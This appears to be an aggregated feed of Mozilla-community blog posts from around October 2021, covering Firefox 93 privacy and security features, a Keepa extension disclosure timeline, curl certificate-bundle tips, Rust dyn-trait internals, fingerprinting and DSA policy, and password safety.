Keepa exposing its scraping functionality to arbitrary websites could have had severe impact. With any website being able to extract security tokens this way, impersonating the user towards Amazon would have been possible. Luckily, security measures on Amazon’s side prevented this scenario. Nevertheless, this vulnerability was very concerning. The fact that the extension still doesn’t use inherently secure communication channels for this functionality doesn’t make it better.

Timeline

  • 2021-07-07: Reported the vulnerabilities to the vendor via email (no response and no further communication)
  • 2021-09-15: Keepa 3.88 released, fixing data exposure vulnerability
  • 2021-10-04: Published article (90 days deadline)

Mozilla Security Blog: Firefox 93 features an improved SmartBlock and new Referrer Tracking Protections

We are happy to announce that the Firefox 93 release brings two exciting privacy improvements for users of Strict Tracking Protection and Private Browsing. With a more comprehensive SmartBlock 3.0, we combine a great browsing experience with strong tracker blocking. In addition, our new and enhanced referrer tracking protection prevents sites from colluding to share sensitive user data via HTTP referrers.

SmartBlock 3.0

In Private Browsing and Strict Tracking Protection, Firefox goes to great lengths to protect your web browsing activity from trackers. As part of this, the built-in content blocking will automatically block third-party scripts, images, and other content from being loaded from cross-site tracking companies reported by Disconnect. This type of aggressive blocking could sometimes bring small inconveniences, such as missing images or bad performance. In some rare cases, it could even result in a feature malfunction or an empty page.

To compensate, we developed SmartBlock, a mechanism that will intelligently load local, privacy-preserving alternatives to the blocked resources that behave just enough like the original ones to make sure that the website works properly.

The third iteration of SmartBlock brings vastly improved support for replacing the popular Google Analytics scripts and added support for popular services such as Optimizely, Criteo, Amazon TAM and various Google advertising scripts.

As usual, these replacements are bundled with Firefox and can not track you in any way.

HTTP Referrer Protections

The HTTP Referer [sic] header is a browser signal that reveals to a website which location “referred” the user to that website’s server. It is included in navigations and sub-resource requests a browser makes and is frequently used by websites for analytics, logging, and cache optimization. When sent as part of a top-level navigation, it allows a website to learn which other website the user was visiting before.

This is where things get problematic. If the browser sends the full URL of the previous site, then it may reveal sensitive user data included in the URL. Some sites may want to avoid being mentioned in a referrer header at all.

The Referrer Policy was introduced to address this issue: it allows websites to control the value of the referrer header so that a stronger privacy setting can be established for users. In Firefox 87, we went one step further and decided to set the new default referrer policy to strict-origin-when-cross-origin which will automatically trim the most sensitive parts of the referrer URL when it is shared with another website. As such, it prevents sites from unknowingly leaking private information to trackers.
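
For example, under the strict-origin-when-cross-origin default, a cross-site request that previously could have revealed a full URL now only reveals the origin (the URL and token below are made up for illustration):

Previously sent:  Referer: https://example.com/account/reset?token=1a2b3c
Now sent:         Referer: https://example.com/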

However, websites can still override the introduced default trimming of the referrer, and hence effectively deactivate this protection and send the full URL anyway. This would invite websites to collude with trackers by choosing a more permissive referrer policy and as such remains a major privacy issue.

With the release of version 93, Firefox will ignore less restrictive referrer policies for cross-site requests, such as ‘no-referrer-when-downgrade’, ‘origin-when-cross-origin’, and ‘unsafe-url’, rendering such privacy violations ineffective. In other words, Firefox will always trim the HTTP referrer for cross-site requests, regardless of the website’s settings.

For same-site requests, websites can of course still send the full referrer URL.

Enabling these new Privacy Protections

As a Firefox user who is using Strict Tracking Protection and Private Browsing, you can benefit from the additionally provided privacy protection mechanism as soon as your Firefox auto-updates to Firefox 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 features an improved SmartBlock and new Referrer Tracking Protections appeared first on Mozilla Security Blog.

Mozilla Security Blog: Firefox 93 protects against Insecure Downloads


Downloading files on your device still poses a major security risk and can ultimately lead to an entire system compromise by an attacker, especially because the security risks are not apparent. To better protect you from the dangers of insecure, or even undesired, downloads, we integrated the following two security enhancements, which will increase security when you download files on your computer. In detail, Firefox will:

  • block insecure HTTP downloads on a secure HTTPS page, and
  • block downloads in sandboxed iframes, unless the iframe is explicitly annotated with the allow-downloads attribute.


Blocking Downloads relying on insecure connections

Downloading files via an insecure HTTP connection generally poses a major security risk because data transferred by the regular HTTP protocol is unprotected and transferred in clear text, such that attackers are able to view, steal, or even tamper with the transmitted data. Put differently, downloading a file over an insecure connection allows an attacker to replace the file with malicious content which, when opened, can ultimately lead to an entire system compromise.


Firefox 93 prompting the end user about a ‘Potential security risk’ when downloading a file using an insecure connection.


As illustrated in the figure above, if Firefox detects such an insecure download, it will initially block the download and prompt you, signalling the potential security risk. This prompt allows you to either stop the download and Remove the file, or alternatively grants you the option to override the decision and download the file anyway, though it’s safer to abandon the download at this point.


Blocking Downloads in sandboxed iframes

The Inline Frame sandbox attribute is the preferred way to lock down capabilities of embedded third-party content. Currently, even with the sandbox attribute set, malicious content could initiate a drive-by download, prompting the user to download malicious files. Unless the sandboxed content is explicitly annotated with the ‘allow-downloads’ attribute, Firefox will protect you against such drive-by downloads. Put differently, downloads initiated from sandboxed contexts without this attribute will be canceled silently in the background without any user browsing disruption.


It’s Automatic!

As a Firefox user, you can benefit from the additionally provided security mechanism as soon as your Firefox auto-updates to version 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 protects against Insecure Downloads appeared first on Mozilla Security Blog.

Mozilla Security Blog: Securing Connections: Disabling 3DES in Firefox 93

As part of our continuing work to ensure that Firefox provides secure and private network connections, it periodically becomes necessary to disable configurations or even entire protocols that were once thought to be secure, but no longer provide adequate protection. For example, last year, early versions of the Transport Layer Security (TLS) protocol were disabled by default.

One of the options that goes into configuring TLS is the choice of which encryption algorithms to enable. That is, which methods are available to use to encrypt and decrypt data when communicating with a web server?

Goodbye, 3DES

3DES (“triple DES”, an adaptation of DES (“Data Encryption Standard”)) was for many years a popular encryption algorithm. However, as attacks against it have become stronger, and as other more secure and efficient encryption algorithms have been standardized and are now widely supported, it has fallen out of use. Recent measurements indicate that Firefox encounters servers that choose to use 3DES about as often as servers that use deprecated versions of TLS.

As long as 3DES remains an option that Firefox provides, it poses a security and privacy risk. Because it is no longer necessary or prudent to use this encryption algorithm, it is disabled by default in Firefox 93.

Addressing Compatibility

As with disabling obsolete versions of TLS, deprecating 3DES may cause compatibility issues. We hypothesize that the remaining uses of 3DES correspond mostly to outdated devices that use old cryptography and cannot be upgraded. It may also be that some modern servers inexplicably (perhaps unintentionally) use 3DES when other more secure and efficient encryption algorithms are available. Disabling 3DES by default helps with the latter case, as it forces those servers to choose better algorithms. To account for the former situation, Firefox will allow 3DES to be used when deprecated versions of TLS have manually been enabled. This will protect connections by default by forbidding 3DES when it is unnecessary while allowing it to be used with obsolete servers if necessary.

The post Securing Connections: Disabling 3DES in Firefox 93 appeared first on Mozilla Security Blog.

The Mozilla Blog: Do you need a VPN at home? Here are 5 reasons you might.

You might have heard of VPNs — virtual private networks — at some point, and chalked them up to something only “super techy” people or hackers would ever use. At this point in the evolution of online life, however, VPNs have become more mainstream, and anyone may have good reasons to use one. VPNs are beneficial for added security when you’re connected to a public wifi network, and you might also want to use a VPN at home when you’re online as well. Here are five reasons to consider using a VPN at home.

Stop your ISP from watching you 

Did you know that when you connect to the internet at home through your internet service provider (ISP), it can track what you do online? Your ISP can see every site you visit and track things like how often you visit sites and how long you’re on them. That’s rich personal — and private — information you’re giving away to your ISP every time you connect to the internet at home. The good news is that a VPN at home can prevent your ISP from snooping on you by encrypting your traffic before the ISP can see it.

How do VPNs work?

Get answers to nine common questions about VPNs

Secure yourself on a shared building network

Some apartment buildings offer wifi as an incentive to residents, but how secure is the network? Do you even know all your neighbors, let alone know if they’re true crime podcast fanatics or even actual cyber criminals? Do you know for sure that your landlord or building manager isn’t tracking your internet traffic? If you’re concerned about any of that, a VPN can add extra security on your shared network by encrypting your traffic between you and your VPN provider so that no one on your local network can decipher or modify it.

Block nosy housemates

Similar to a shared apartment network, sharing an internet connection could leave your internet traffic vulnerable to snooping by housemates or any other untrustworthy person who accesses your network. A VPN at home can help by encrypting your traffic so they can’t see it.

Increase remote work security

Working remotely, at least part of the time, is the new normal for millions of office workers. Some employers offer a VPN for home workers and some even require it. A VPN prevents an unknown entity from monitoring your traffic through network “sniffing.” If you work with confidential or sensitive information online, a VPN should be essential to your remote work setup.

Explore the world at home

There are some fun reasons to use a VPN at home, too. You can get access to shows, websites and livestreams in dozens of different countries. See what online shopping is like in a different locale and get the feeling of gaming from somewhere new.

The post Do you need a VPN at home? Here are 5 reasons you might. appeared first on The Mozilla Blog.

Cameron Kaiser: TenFourFox FPR32 SPR5 available (the last official build)

TenFourFox Feature Parity Release 32 Security Parity Release 5 "32.5" is available for testing (downloads, hashes). Aside from the announced change with .inetloc and .webloc handling, this release also updates the ATSUI font blacklist and includes the usual security updates. It will go live Monday evening Pacific as usual assuming no issues.

As stated previously, this is the last official build before TenFourFox goes into hobby mode; version checking is therefore disabled in this release since there will be no new official build to check for. I know I keep teasing a future consolidated post about how users who want to continue using it can get or make their own builds, but I want to update the docs and FAQ first, plus actually give you something new to test your build with (in this case it's going to be switching the certificate and security base over to Firefox 91ESR from 78ESR). There are already some options apart from the official method and we'll discuss those, but if you yourself are gearing up to offer public builds or toolkits, feel free to make this known in the comments. Work is a little hairy this month but I want to get to this in the next couple weeks.

Cameron Kaiser: curl, Let's Encrypt and Apple laziness

The built-in version of curl on any Power Mac version of OS X will not be capable of TLS 1.1 or higher, so most of you who need it will have already upgraded to an equivalent with MacPorts. However, even for later Intel Macs that are ostensibly supported -- including my now legacy MacBook Air with Mojave I keep around for running 32-bit Intel -- the expiration of one of Let's Encrypt's root certificates yesterday means curl may suddenly cease connecting to TLS sites with Let's Encrypt certificates. Yesterday I was trying to connect to one of my own Floodgap sites, unexpectedly got certificate errors I wasn't seeing in TenFourFox or mainline Firefox, and, after a moment of panic, realized what had happened. While you can use -k to ignore the error, that basically defeats the entire idea of having a certificate to start with.

The real hell of it is that Mojave 10.14 is still technically supported by Apple, and you would think updating the curl root certificate store would be an intrinsic part of security updates, but you'd be wrong. The issue with old roots even affects Safari on some Monterey betas, making the best explanation more Apple laziness than benign neglect. Firefox added this root ages ago and so did TenFourFox.

If you are using MacPorts curl, which is (IMHO) the best solution on Power Macs due to Ken's diligence but is still a dandy alternative to Homebrew on Intel Macs, the easiest solution is to ensure curl-ca-bundle is up-to-date. Homebrew (and I presume Tigerbrew, for 10.4) can do brew install curl-ca-bundle, assuming your installation is current.

However, I use the built-in curl on the Mojave MacBook Air. Ordinarily I would just do an in-place update of the root certificate bundle, as I did on my 10.4 G5 before I started using a self-built curl, but thanks to System Integrity Protection you're not allowed to do that anymore even as root. Happily, the cURL maintainers themselves have a downloadable root certificate store which is periodically refreshed. Download that, put it somewhere in your home directory, and in your .login or .profile or whatever, set CURL_CA_BUNDLE to its location (on my system, I have a ~/bin directory, so I put it there and set it to /Users/yourname/bin/cacert.pem).

The Mozilla BlogMiracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we will share the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution.

Here’s what made it to the Top Shelf for the week of September 27, 2021, in no particular order.

From Licorice Pizza to McRibs to #NationalCoffeeDay, food-related topics boiled to the top of the trends this week on Twitter, though not every one of them is actually food… we’ll leave you to decide which!

The Pocket Joy List Project

The stories, podcasts, poems and songs we always come back to

The post Miracle Whip, Finstas, #InternationalPodcastDay, and #FreeBritney all made the Top Shelf this week appeared first on The Mozilla Blog.

The Mozilla BlogAnalysis of Google’s Privacy Budget Proposal

Fingerprinting is a major threat to user privacy on the Web. Fingerprinting uses existing properties of your browser like screen size, installed add-ons, etc. to create a unique or semi-unique identifier which it can use to track you around the Web. Even if individual values are not particularly unique, the combination of values can be unique (e.g., how many people are running Firefox Nightly, live in North Dakota, have an M1 Mac and a big monitor, etc.).

This post discusses a proposal by Google to address fingerprinting called the Privacy Budget. The idea behind the Privacy Budget is to estimate the amount of information revealed by each piece of fingerprinting information (called a “fingerprinting surface”, e.g., screen resolution) and then limit the total amount of that information a site can obtain about you. Once the site reaches that limit (the “budget”), further attempts to learn more about you would fail, perhaps by reporting an error or returning a generic value. This idea has been getting a fair amount of attention and has been proposed as a potential privacy mitigation in some in-development W3C specifications.
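
For intuition about what “amount of information” means here, information is conventionally measured in bits: a trait observed with probability p reveals -log2(p) bits about you. Here is a minimal C sketch of that arithmetic (our own illustration with invented prevalence numbers; it is not part of Google’s proposal):

#include <stdio.h>
#include <math.h>

/* Self-information of observing a trait with probability p, in bits. */
static double bits_revealed(double p) {
    return -log2(p);
}

int main(void) {
    /* The prevalence figures below are made up purely for illustration. */
    printf("uses Chrome (p = 0.65):            %.1f bits\n", bits_revealed(0.65));
    printf("uses Firefox Nightly (p = 0.0001): %.1f bits\n", bits_revealed(0.0001));
    return 0;
}

Roughly 33 bits are enough to single out one person among eight billion, which is why even a few rare traits can combine into a unique fingerprint.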

While this seems like an attractive idea, our detailed analysis of the proposal raises questions about its feasibility.  We see a number of issues:

  • Estimating the amount of information revealed by a single surface is quite difficult. Moreover, because some values will be much more common than others, any total estimate is misleading. For instance, the Chrome browser has many users and so learning someone uses Chrome is not very identifying; by contrast, learning that someone uses Firefox Nightly is quite identifying because there are few Nightly users.
  • Even if we are able to set a common value for the budget, it is unclear how to determine whether a given set of queries exceeds that value. The problem is that these queries are not independent and so you can’t just add up each query. For instance, screen width and screen height are highly correlated and so once a site has queried one, learning the other is not very informative.
  • Enforcement is likely to lead to surprising and disruptive site breakage because sites will exceed the budget and then be unable to make API calls which are essential to site function. This will be exacerbated because the order in which the budget is used is nondeterministic and depends on factors such as the network performance of various sites, so some users will experience breakage and others will not.
  • It is possible that the privacy budget mechanism itself can be used for tracking by exhausting the budget with a particular pattern of queries and then testing to see which queries still work (because they already succeeded).

While we understand the appeal of a global solution to fingerprinting — and no doubt this is the motivation for the Privacy Budget idea appearing in specifications — the underlying problem here is the large amount of fingerprinting-capable surface that is exposed to the Web. There does not appear to be a shortcut around addressing that. We believe the best approach is to minimize the easy-to-access fingerprinting surface by limiting the amount of information exposed by new APIs and gradually reducing the amount of information exposed by existing APIs. At the same time, browsers can and should attempt to detect abusive patterns by sites and block those sites, as Firefox already does.

This post is part of a series of posts analyzing privacy-preserving advertising proposals.

For more on this:

Building a more privacy-preserving ads-based ecosystem

The future of ads and privacy

Privacy analysis of FLoC

Mozilla responds to the UK CMA consultation on google’s commitments on the Chrome Privacy Sandbox

Privacy analysis of SWAN.community and Unified ID 2.0

The post Analysis of Google’s Privacy Budget Proposal appeared first on The Mozilla Blog.

Niko MatsakisDyn async traits, part 2

In the previous post, we uncovered a key challenge for dyn and async traits: the fact that, in Rust today, dyn types have to specify the values for all associated types. This post is going to dive into more background about how dyn traits work today, and in particular it will talk about where that limitation comes from.

Today: Dyn traits implement the trait

In Rust today, assuming you have a “dyn-safe” trait DoTheThing, the type dyn DoTheThing implements DoTheThing. Consider this trait:

trait DoTheThing {
    fn do_the_thing(&self);
}

impl DoTheThing for String {
    fn do_the_thing(&self) {
        println!("{}", self);
    }
}

And now imagine some generic function that uses the trait:

fn some_generic_fn<T: ?Sized + DoTheThing>(t: &T) {
    t.do_the_thing();
}

Naturally, we can call some_generic_fn with a &String, but — because dyn DoTheThing implements DoTheThing — we can also call some_generic_fn with a &dyn DoTheThing:

fn some_nongeneric_fn(x: &dyn DoTheThing) {
    some_generic_fn(x)
}

Dyn safety, a mini retrospective

Early on in Rust, we debated whether dyn DoTheThing ought to implement the trait DoTheThing or not. This was, indeed, the origin of the term “dyn safe” (then called “object safe”). At the time, I argued in favor of the current approach: that is, creating a binary property. Either the trait was dyn safe, in which case dyn DoTheThing implements DoTheThing, or it was not, in which case dyn DoTheThing is not a legal type. I am no longer sure that was the right call.

What I liked at the time was the idea that, in this model, whenever you see a type like dyn DoTheThing, you know that you can use it like any other type that implements DoTheThing.

Unfortunately, in practice, the type dyn DoTheThing is not comparable to a type like String. Notably, dyn types are not sized, so you can’t pass them around by value or work with them like strings. You must instead always pass around some kind of pointer to them, such as a Box<dyn DoTheThing> or a &dyn DoTheThing. This is “unusual” enough that we make you opt-in to it for generic functions, by writing T: ?Sized.

What this means is that, in practice, generic functions don’t accept dyn types “automatically”; you have to design for dyn explicitly. So a lot of the benefit I envisioned didn’t come to pass.
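
As a minimal sketch of that point (illustrative only, not from the original example): the implicit T: Sized default on generics is exactly what keeps dyn values out until you opt in.

trait DoTheThing {
    fn do_the_thing(&self);
}

impl DoTheThing for String {
    fn do_the_thing(&self) {
        println!("{}", self);
    }
}

// T is implicitly `T: Sized`, so `T = dyn DoTheThing` is rejected here.
fn sized_only<T: DoTheThing>(t: &T) {
    t.do_the_thing();
}

// Opting in with `?Sized` is what makes dyn values acceptable.
fn dyn_friendly<T: ?Sized + DoTheThing>(t: &T) {
    t.do_the_thing();
}

fn main() {
    let s = String::from("hi");
    let d: &dyn DoTheThing = &s;
    // sized_only(d); // ERROR: `dyn DoTheThing` doesn't have a size known at compile-time
    dyn_friendly(d); // OK
    sized_only(&s); // OK: `String` is sized
}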

Static versus dynamic dispatch, vtables

Let’s talk for a bit about dyn safety and where it comes from. To start, we need to explain the difference between static dispatch and virtual (dyn) dispatch. Simply put, static dispatch means that the compiler knows which function is being called, whereas dyn dispatch means that the compiler doesn’t know. In terms of the CPU itself, there isn’t much difference. With static dispatch, there is a “hard-coded” instruction that says “call the code at this address”1; with dynamic dispatch, there is an instruction that says “call the code whose address is in this variable”. The latter can be a bit slower but it hardly matters in practice, particularly with a successful prediction.

When you use a dyn trait, what you actually have is a vtable. You can think of a vtable as being a kind of struct that contains a collection of function pointers, one for each method in the trait. So the vtable type for the DoTheThing trait might look like (in practice, there is a bit of extra data, but this is close enough for our purposes):

struct DoTheThingVtable {
    do_the_thing: fn(*mut ())
}

Here the do_the_thing method has a corresponding field. Note that the type of the first argument ought to be &self, but we changed it to *mut (). This is because the whole idea of the vtable is that you don’t know what the self type is, so we just changed it to “some pointer” (which is all we need to know).

When you create a vtable, you are making an instance of this struct that is tailored to some particular type. In our example, the type String implements DoTheThing, so we might create the vtable for String like so:

static Vtable_DoTheThing_String: &DoTheThingVtable = &DoTheThingVtable {
    do_the_thing: <String as DoTheThing>::do_the_thing as fn(*mut ())
    //            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    //            Fully qualified reference to `do_the_thing` for strings
};

You may have heard that a &dyn DoTheThing type in Rust is a wide pointer. What that means is that, at runtime, it is actually a pair of two pointers: a data pointer and a vtable pointer for the DoTheThing trait. So &dyn DoTheThing is roughly equivalent to:

(*mut (), &'static DoTheThingVtable)

When you cast a &String to a &dyn DoTheThing, what actually happens at runtime is that the compiler takes the &String pointer, casts it to *mut (), and pairs it with the appropriate vtable. So, if you have some code like this:

let x: &String = &"Hello, Rustaceans".to_string();
let y: &dyn DoTheThing = x;

It winds up “desugared” to something like this:

let x: &String = &"Hello, Rustaceans".to_string();
let y: (*mut (), &'static DoTheThingVtable) = 
    (x as *mut (), Vtable_DoTheThing_String);
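
As a quick sanity check of that layout (an illustrative sketch, not from the original example), you can ask the compiler for the sizes directly:

use std::mem::size_of;

fn main() {
    // A thin reference is one machine word...
    assert_eq!(size_of::<&String>(), size_of::<usize>());
    // ...while a dyn reference carries a data pointer plus a vtable pointer.
    assert_eq!(size_of::<&dyn std::fmt::Debug>(), 2 * size_of::<usize>());
    println!("wide pointers confirmed");
}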

The dyn impl

We’ve seen how you create wide pointers and how the compiler represents vtables. We’ve also seen that, in Rust, dyn DoTheThing implements DoTheThing. You might wonder how that works. Conceptually, the compiler generates an impl where each method in the trait is implemented by extracting the function pointer from the vtable and calling it:

impl DoTheThing for dyn DoTheThing {
    fn do_the_thing(self: &dyn DoTheThing) {
        // Remember that `&dyn DoTheThing` is equivalent to
        // a tuple like `(*mut (), &'static DoTheThingVtable)`:
        let (data_pointer, vtable_pointer) = self;

        let function_pointer = vtable_pointer.do_the_thing;
        function_pointer(data_pointer);
    }
}

In effect, when we call a generic function like some_generic_fn with T = dyn DoTheThing, we monomorphize that call exactly like any other type. The call to do_the_thing is dispatched against the impl above, and it is that special impl that actually does the dynamic dispatch. Neat.

Static dispatch permits monomorphization

Now that we’ve seen how and when vtables are constructed, we can talk about the rules for dyn safety and where they come from. One of the most basic rules is that a trait is only dyn-safe if it contains no generic methods (or, more precisely, if its methods are only generic over lifetimes, not types). The reason for this rule derives directly from how a vtable works: when you construct a vtable, you need to give a single function pointer for each method in the trait (or, perhaps, a finite set of function pointers). The problem with generic methods is that there is no single function pointer for them: you need a different pointer for each type that they’re applied to. Consider this example trait, PrintPrefixed:

trait PrintPrefixed {
    fn prefix(&self) -> String;
    fn apply<T: Display>(&self, t: T);
}

impl PrintPrefixed for String {
    fn prefix(&self) -> String {
        self.clone()
    }
    fn apply<T: Display>(&self, t: T) {
        println!("{}: {}", self, t);
    }
}

What would a vtable for String as PrintPrefixed look like? Generating a function pointer for prefix is no problem, we can just use <String as PrintPrefixed>::prefix. But what about apply? We would have to include a function pointer for <String as PrintPrefixed>::apply<T>, but we don’t know yet what the T is!

In contrast, with static dispatch, we don’t have to know what T is until the point of call. In that case, we can generate just the copy we need.

Partial dyn impls

The previous point shows that a trait can have some methods that are dyn-safe and some methods that are not. In current Rust, this makes the entire trait be “not dyn safe”, and this is because there is no way for us to write a complete impl PrintPrefixed for dyn PrintPrefixed:

impl PrintPrefixed for dyn PrintPrefixed {
    fn prefix(&self) -> String {
        // For `prefix`, no problem:
        let prefix_fn = /* get prefix function pointer from vtable */;
        prefix_fn();
    }
    fn apply<T: Display>(&self, t: T) {
        // For `apply`, we can’t handle all `T` types, what field to fetch?
        panic!("No way to implement apply")
    }
}

Under the alternative design that was considered long ago, we could say that a dyn PrintPrefixed value is always legal, but dyn PrintPrefixed only implements the PrintPrefixed trait if all of its methods (and other items) are dyn safe. Either way, if you had a &dyn PrintPrefixed, you could call prefix. You just wouldn’t be able to use a dyn PrintPrefixed with generic code like fn foo<T: ?Sized + PrintPrefixed>.

(We’ll return to this theme in future blog posts.)

If you’re familiar with the “special case” around trait methods that require where Self: Sized, you might be able to see where it comes from now. If a method has a where Self: Sized requirement, and we have an impl for a type like dyn PrintPrefixed, then we can see that this method could never be called through that impl, and so we can omit it from the impl (and vtable) altogether. This is awfully similar to saying that dyn PrintPrefixed is always legal, because it means that only a subset of the trait’s methods can be used via virtual dispatch. The difference is that dyn PrintPrefixed: PrintPrefixed still holds, because we know that generic code won’t be able to call those “non-dyn-safe” methods, since generic code would have to require that T: ?Sized.
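
To make that concrete, here is an illustrative sketch (a variant of the earlier trait, with a default body added to apply): the where Self: Sized bound fences off the generic method, and the trait as a whole stays dyn-safe.

use std::fmt::Display;

trait PrintPrefixed {
    fn prefix(&self) -> String;

    // Exempt from the vtable: callable only when the concrete type
    // is known, which is what lets the trait stay dyn-safe.
    fn apply<T: Display>(&self, t: T)
    where
        Self: Sized,
    {
        println!("{}: {}", self.prefix(), t);
    }
}

impl PrintPrefixed for String {
    fn prefix(&self) -> String {
        self.clone()
    }
}

fn main() {
    let s = String::from("prefix");
    let p: &dyn PrintPrefixed = &s;
    println!("{}", p.prefix()); // OK: virtual dispatch through the vtable
    // p.apply(22);             // ERROR: `apply` requires `Self: Sized`
    s.apply(22); // OK: the concrete type is known statically
}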

Associated types and dyn types

We began this saga by talking about associated types and dyn types. In Rust today, a dyn type is required to specify a value for each associated type in the trait. For example, consider a simplified Iterator trait:

trait Iterator {
    type Item;

    fn next(&mut self) -> Option<Self::Item>;
}

This trait is dyn safe, but if you actually want to use a dyn value in practice, you would have to write something like dyn Iterator<Item = u32>. The impl Iterator for dyn Iterator looks like:

impl<T> Iterator for dyn Iterator<Item = T> {
    type Item = T;
    
    fn next(&mut self) -> Option<T> {
        let next_fn = /* get next function from vtable */;
        return next_fn(self);
    }
}

Now you can see why we require all the associated types to be part of the dyn type — it lets us write a complete impl (i.e., one that includes a value for each of the associated types).

Conclusion

We covered a lot of background in this post:

  • Static vs dynamic dispatch, vtables
  • The origin of dyn safety, and the possibility of “partial dyn safety”
  • The idea of a synthesized impl Trait for dyn Trait

Mozilla Open Policy & Advocacy BlogAddressing gender-based online harms in the DSA

Last year the European Commission published the Digital Services Act (DSA) proposal, a draft law that seeks to set a new standard for platform accountability. We welcomed the draft law when it was published, and since then we have been working to ensure it is strengthened and elaborated as it proceeds through the mark-up stage. Today we’re confirming our support for a new initiative that focuses on improving the DSA with respect to gender-based online harm, an objective that aligns with our policy vision and the Mozilla Manifesto addendum.

Our efforts to improve the DSA have focused above all on the draft law’s risk assessment and auditing provisions. In order to structurally improve the health of the internet ecosystem, we need laws that compel platforms to meaningfully assess and mitigate the systemic risks stemming from the design and operation of their services. While the draft DSA is a good start, it falls short when it comes to specifying the types of systemic risks that platforms need to address.

One such area of systemic risk that warrants urgent attention is gender-based online harm. Women and non-binary people are subject to massive and persistent abuse online, with 74% of women reporting experiencing some form of online violence in the EU in 2020. Women from marginalised communities, including LGBTQ+ people, women of colour, and Black women in particular, are often disproportionately targeted with online abuse.

In our own platform accountability research this untenable reality has surfaced time and time again. For instance, in a testimony submitted to Mozilla Foundation as part of our YouTube Regrets campaign, one person wrote: “In coming out to myself and close friends as transgender, my biggest regret was turning to YouTube to hear the stories of other trans and queer people. Simply typing in the word “transgender” brought up countless videos that were essentially describing my struggle as a mental illness and as something that shouldn’t exist. YouTube reminded me why I hid in the closet for so many years.”

Another story read: “I was watching a video game series on YouTube when all of a sudden I started getting all of these anti-women, incel and men’s rights recommended videos. I ended up removing that series from my watch history and going through and flagging those bad recommendations as ‘not interested’. It was gross and disturbing. That stuff is hate, and I really shouldn’t have to tell YouTube that it’s wrong to promote it.”

Indeed, further Mozilla research into this issue on YouTube has underscored the role of automated content recommender systems in exacerbating the problem, to the extent that they can recommend videos that violate the platform’s very own policies, like hate speech.

This is not only a problem on YouTube, but on the web at large. And while the DSA is not a silver bullet for addressing gender-based online harm, it can be an important part of the solution. To underscore that belief, we – as the Mozilla Foundation – have today signed on to a joint Call with stakeholders from across the digital rights, democracy, and women’s rights communities. This Call aims to invigorate efforts to improve the DSA provisions around risk assessment and management, and ensure lawmakers appreciate the scale of gender-based online harm that communities face today.

This initiative complements other DSA-focused engagements that seek to address gender-based online harms. In July, we signaled our support for the Who Writes the Rules campaign, and we stand in solidarity with the just-published testimonies of gender-based online abuse faced by the initiative’s instigators.

The DSA has been rightly billed as an accountability game-changer. Lawmakers owe it to those who suffer gender-based online harm to ensure those systemic risks are properly accounted for.

The full text of the Call can be read here.

The post Addressing gender-based online harms in the DSA appeared first on Open Policy & Advocacy.

The Mozilla BlogSuperhero passwords may be your kryptonite wherever you go online

A password is like a key to your house. In the online world, your password keeps your house of personal information safe, so a super strong password is like having a superhero in a fight of good vs. evil. In recognition of Cybersecurity Awareness month, we revisited our “Princesses make terrible passwords for Disney+ and every other account” post and took a look to see how fortified superhero passwords are in the fight against hackers and breaches. According to haveibeenpwned.com, here’s how many times these superhero passwords have shown up in breached datasets:

And if you thought maybe their real identities might make for a better password, think again!

Lucky for you, we’ve got a family of products from a company you can trust: Mozilla, a mission-driven organization with a 20-year track record of fighting for online privacy and a healthier internet. Here are your best tools in the fight against hackers and breaches:

Keep passwords safe from cyber threats with new super powers in Firefox on Android

This Cybersecurity Awareness month, we added new features to keep your passwords safe in Firefox on Android. You might not have every password memorized by heart, nor do you need to when you use Firefox. With Firefox, you can seamlessly access your saved passwords and use them to log into any online account, like your Twitter or Instagram app. No need to open a web page. It’s that seamless and simple. Plus, you can use biometric security, such as your face or fingerprint, to unlock the app and safely access your accounts. These new features will be available next Tuesday with the latest Firefox on Android release. Here are more details on the upcoming new features:

  • Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and use on both mobile and desktop.
<figcaption>Create and add new passwords</figcaption>
  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
<figcaption>Sync all your passwords across desktop and mobile devices</figcaption>
  • Unlock your passwords with your fingerprint and face – Now only you can safely open your accounts when you use biometric security such as your fingerprint or face to unlock the access page to your logins and passwords.

Forget J.A.R.V.I.S, keep informed of hacks and breaches with Firefox Monitor 

Keep your spidey senses from tingling every time you hear about hacks and breaches by signing up with Firefox Monitor. You’ll be able to keep an eye on your accounts once you sign up for Firefox Monitor and get alerts delivered to your email whenever there’s been a data breach or if your accounts have been hacked.

X-ray vision won’t work on a Virtual Private Network like Mozilla VPN

One of the reasons people use a Virtual Private Network (VPN), an encrypted connection that serves as a tunnel between your computer and VPN server, is to protect themselves whenever they use a public WiFi network. It sounds harmless, but public WiFi networks can be like a backdoor for hackers. With a VPN, you can rest assured you’re safe whenever you use the public WiFi network at your local cafe or library. Find and use a trusted VPN provider like our Mozilla VPN, a fast and easy-to-use VPN service. Thousands of people have signed up to subscribe to our Mozilla VPN, which provides encryption and device-level protection of your connection and information when you are on the Web.


How did we get these numbers? Unfortunately, we don’t have a J.A.R.V.I.S., so we looked these up on haveibeenpwned.com. We couldn’t access any data files, browse lists of passwords or link passwords to logins — that info is inaccessible and kept secure — but we could look up random passwords manually. Current numbers on the site may be higher than at time of publication as new datasets are added to HIBP. Alas, data breaches keep happening. There’s no time like the present to make sure all your passwords are built like Iron Man.

The post Superhero passwords may be your kryptonite wherever you go online appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgMDN Web Docs at Write the Docs Prague 2021

The MDN Web Docs team is pleased to sponsor Write the Docs Prague 2021, which is being held remotely this year. We’re excited to join hundreds of documentarians to learn more about collaborating with writers, developers, and readers to make better documentation. We plan to take part in all that the conference has to offer, including the Writing Day, Job Fair, and the virtual hallway track.

